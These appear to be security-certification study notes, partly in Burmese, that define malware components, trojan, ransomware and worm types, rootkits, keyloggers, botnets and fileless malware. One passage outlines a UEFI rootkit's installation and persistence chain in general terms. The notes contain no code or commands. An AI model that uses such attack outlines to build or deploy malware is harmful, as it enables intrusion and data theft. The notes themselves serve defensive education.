🦾1 Understanding the Threat and Threat Sources
🦾2 Understanding the Threat Actors/Agents
🦾 3 Understanding Various Threat Vectors
🦾 4 Overview of the Malware and t he Common Techniques Attackers Use to Distribute Malware
🦾 5 Understanding the Different Types of Malware
🦾 6 Understanding the Vulnerability and Examples of Network Security Vulnerabilities
🦾 7 Overview of the Common Areas of Vulnerability
🦾 8 Understanding the Impact of Vulnerabilities
🦾 9 Understanding the Risk of Vulnerabilities
🦾 10 Understanding the Classification of Vulnerabilities
Threat Sources
Multi-column
components of malware
■ Crypter: Software that protects malware from undergoing reverse engineering or analysis.
■ Downloader: A type of Trojan t hat downloads other malware from the Internet on to the PC.
■ Dropper: A type of Troj an that covertly installs other malware files on to the system.
■ Exploit: A malicious code that b reaches t he system security via software vulnerabilities to access information or install malware
■ Injector: A program that injects its code in to other vulnerable running processes and changes how th ey exec ute to
hide or prevent its removal.
■ Obfuscator: It is a program that conceals the malicious code of malware via various
techniques, thus making it difficult for security mechanisms to detect or remove it.
■ Packer: A program that allows all files to bundle t ogether into a single executab le fi le via compression to bypass
security software detection.
■ Payload: A piece of software that allows control over a computer system after it has been exploited.
■ Malicious Code: A command that defines malware's basic functionalities such as stealing data and creating backdoors:
Java Applets
ActiveX Controls
Browser Plug-ins
Pushed Content
types of malware
A malware is a piece of malicious software that is designed to perform activities intended by
the attacker without user consent. It may be in the form of executable code, active content,
scripts, or other kinds of software.
Listed below are various type s of malware:
Types of Trojans (1)
Multi-column
Trojans တိုက်ခိုက်ခံရပြီဆိုရင်
The computer screen blinks, flips
upside-down, or is inverted so that
everything is displayed backward
The default background or wal lpaper settings change automatically
Web pages suddenly open without input from the user
The color settings of the operating system (OS) change automatically
Antivirus programs are automatically disabled
Pop-ups with bizarre messages suddenly appear
trojans အမျိုးအစားများ
according to their functioning and targets Some of the example includes:
1 Remote Access Trojans
2 Backdoor Trojans
3 Botnet Trojans
4 Rootkit Trojans
5 E- Banking Trojans
6 Point-of- Sale Trojans
7 Defacement Trojans
8 Service Protocol Trojans
9 Mobile Trojans
10 loT Trojans
11 Security Software Disabler Trojans
12 Destructive Trojans
13 DDoS Attack Trojans
14 Command Shell Trojans
trojan ဖန်တီးခြင်း
Some additional Trojan horse construction kit s are as follows:
စာမျက်နှာ-43-စာရွက်-58
Trojan port များအား စာမှက်နှာ ၃၇-၅၂ တွင်ကြည့်နိုင်သည်
A type of malware that restricts access to the computer system's files and folders
Demands an on line ransom payment to the malware creator(s) to remove the restrictions
Example : Dharma
Ransomware အမျိုးအစားများ
Cerber
CryptorBit
CTB-Locker
Crypto Locker
Sodinokibi
Crypto Defense
BitPaymer
CryptoWall
eChOraix
CryptXXX
Police-themed Ransomware
CryptghOst
Mega Cortex
SamSam
LockerGoga
WannaCry
NamPoHyu
Petya - NotPetya
GandCrab
စာမျက်နှာ-၆၅-စာရွက်- ၇၉
Worm (4)
Multi-column
Worm ဆိုတာ
Malicious programs that independently replicate, execute, and spread across the network connections
Consume avai lable computing resources without human interaction
Attackers use worm payloads to install backdoors in infected computers
work အလုပ်လုပ်ပုံ
Wrom အမျိုးအစားများ
Attackers use worm payloads to install backdoors on infected computers, which turns them into zombies and creates a botnet. Attackers use these botnets to initiate cyber-attacks. Some of the latest computer worms are as follows
🐛 Manero
🐛 Bondat
🐛 Beapy
Worm & Virus နှိုင်းယှဉ်ချက်
Multi-column
Virus
A virus infects a system by inserting it self into a file or executable program
It might de l ete or alter the content of files or change the location of files in the system
It alters the way a computer system operates without the knowledge or consent of a user
A virus cannot spread to other computers unless an infected fi le is repl icated and sent to the other computers
A virus spreads at a uniform rate, as programmed
Viruses are difficult to remove from infected machines
worm
A worm infects a system by exploiting a vulnerability in an OS or application by replicating itself
Typically, a worm does not modify any stored programs; it only exploits t he CPU and memory
It consumes network bandwidth, system memory, etc., excessively over loading servers and computer of a user systems
A worm can replicate itself and spread using IRC, Outlook, or other applicable mailing programs after installation in a system
A worm spreads more rapid ly than a virus
Compared with a virus, a worm can be removed machines easily from a system
Computer Worms
Attackers use worm pa yloads to install backdoors on infected computers, which turns them into zombies and creates a botnet. Attacker s use these botnets to initiate cyber-attacks. Some of the latest computer worms are as follows:
Worm Makers
Rootkits (5)
Multi-column
Rootltits ဆိုတာ
Rootkits are programs that hide their presence as well as attacker's malicious activities, granting them full access to the server or host at that time, and in the future
Rootkits replace certain operating system calls and utilities with their ow n modified versions of those routines that, in turn, undermine the security of the target system causing malicious functions to be executed
A typical rootkit comprises of backdoor programs, DDoS programs, packet sniffers, log-wiping utilities, I RC bots, etc.
⚓The attacker places a rootltit by
Scanning for vulnerable computers and servers on the web Wrapping it in a special package like a game
Installing it on public computers or corporate computers through social engineering
Launching a zero-day attack (privilege escalation, buffer overflow, Windows kernel exploitation, etc.)
⚓Objectives of a rootkit:
To root the host system and gain remote backdoor access
To mask attacker tracks and presence of malicious applications or processes
To gather sensitive data, network traffic, etc. from the system to which attackers might be restricted or possess no access
To store other malicious programs on the system and act as a server resource for bot updates
အသုံးများသောRootkits Tools
Collect and save all the system settings in a text file
Access the contents of the system's Serial Peripheral Interface (SPI) memory that contains a UEFI/ BIOS location and save it as a firmware image
Embed a malicious UEFI module (rootkit) into the firmware image and then save the firmware image in the SPI flash memory
The dropper installs a rootkit into the system
The rootkit registers a shutdown callback to achieve persistence. At shutdown, the driver is written to disk, and a start-up service key is created in the registry.>>- The rootkit injects a downloader into an svchost.exe process
The downloader sends some information about the system to the C&C and receives download links
Payloads are downloaded and executed automatically
Potentially Unwanted Application or Applications (PUAs)
Also known as grayware or junkware, are potentially harmful applications that may pose severe risks to the security and privacy of data stored in the system where they are installed
Installed when downloading and installing freeware using a third-party installer or when accepting a misleading license agreement
Covertly monitor and alter the data or settings in the system, similarly to other malware
TypesofPUAs
Hint
Types of PUAs
■ Adware: These PUAs display unsolicited advertisements offering free sales and pop-ups of online services when browsing websites. They may disturb normal activities and lure victims into clicking on malicious U Rls. They may also issue bogus reminders regarding outdated software or OS.
■ Torrent: When using torrent applications for downloading large files, the user may be compelled to download unwanted programs that have features of peer-to-peer file sharing.
■ Marketing: Marketing PUAs monitor the online activities performed by users and send browser details and information regarding personal interests to third-party app owners. These applications then market products and resources based on users' personal interests.
■ Cryptomining: Cryptomining PUAs make use of the victims' personal assets and financial data on the system and perform the digital mining of cryptocurrencies such as bitcoins
■ Dialers: Dialers or spyware dialers are programs that get installed and configured in a system automatically to call a set of contacts at several locations without the user's consent. Dialers cause massive telephone bills and are sometimes very difficult to locate and delete.
Keystroke loggers are programs or hardware devices that monitor each keystroke as the user types on a keyboard, logs onto a file, or transmits them to a remote location
It allows the attacker to gather confidential information about t he victim such as email ID, passwords, banking details, chat room activity, IRC, and instant messages
keylogger ကဘာလုပ်လို့ရလဲ
Record every keystroke typed on the user's keyboard
Capture screenshots at regular intervals, showing user activity such as typed characters
Track the activities of users by logging Window titles, names of launched applications, etc.
Monitor the online activity of users by recording addresses of the websites visited
Record all login names, bank and credit card numbers, and passwords
A Botnet is a collection of compromised computers connected to the Internet to perform a distributed task
Attackers distribute malicious software that turns a user's computer into a bot
Bot refers to a program or an infected system that performs repetitive work or acts as an agent or as a user interface to control other programs
why attackers use botnets?
Perform DDoS attacks, which consume the bandwidth of the victim's computers
Use sniffer to steal information from one botnet and use it against another botnet
Perform keylogging to harvest account login information for services
Use to spread new bots
Perpetrate a "click fraud" by automating clicks
Perform mass identity theft
attackersဒါမျိုးတွေ အသုံးချနိုင်တယ်
DDoS attacks
Spamming
Sniffing traffic
Keylogging
Spreading new malware
Installing advertisement add-ons
Google AdSense abuse
Attacks on IRC chat networks
Manipulating online polls and games
Mass identity theft
စာမျက်နှာ-113-စာရွက်-98
Fileless Malware (10)
Multi-column
အချက်အလက်
Fileless malware, also known as non-malware, infects legitimate software, applications, and other protocols existing in the system to perform various malicious activities
Leverages any existing vulnerabilities to infect the system
Resides in the system's RAM
Injects malicious code into the running processes such as Microsoft Word, Flash, Adobe PDF Reader, Javascript, and PowerShell
ဘာကြောင့်သုံးရတာလဲ?
Stealth: Fileless malware exploits legitimate system tools; hence, it is extremely difficult to detect, block, or prevent fileless attacks
LOL "Living-off-the-land": System tools exploited by fileless malware are already installed in the system by default. An attacker does not need to create and install custom tools on the target system
Trustworthy: The system tools used by fileless malware are the most frequently used and trusted tools; hence, security tools incorrectly assume that such tools are running for a legitimate purpose>
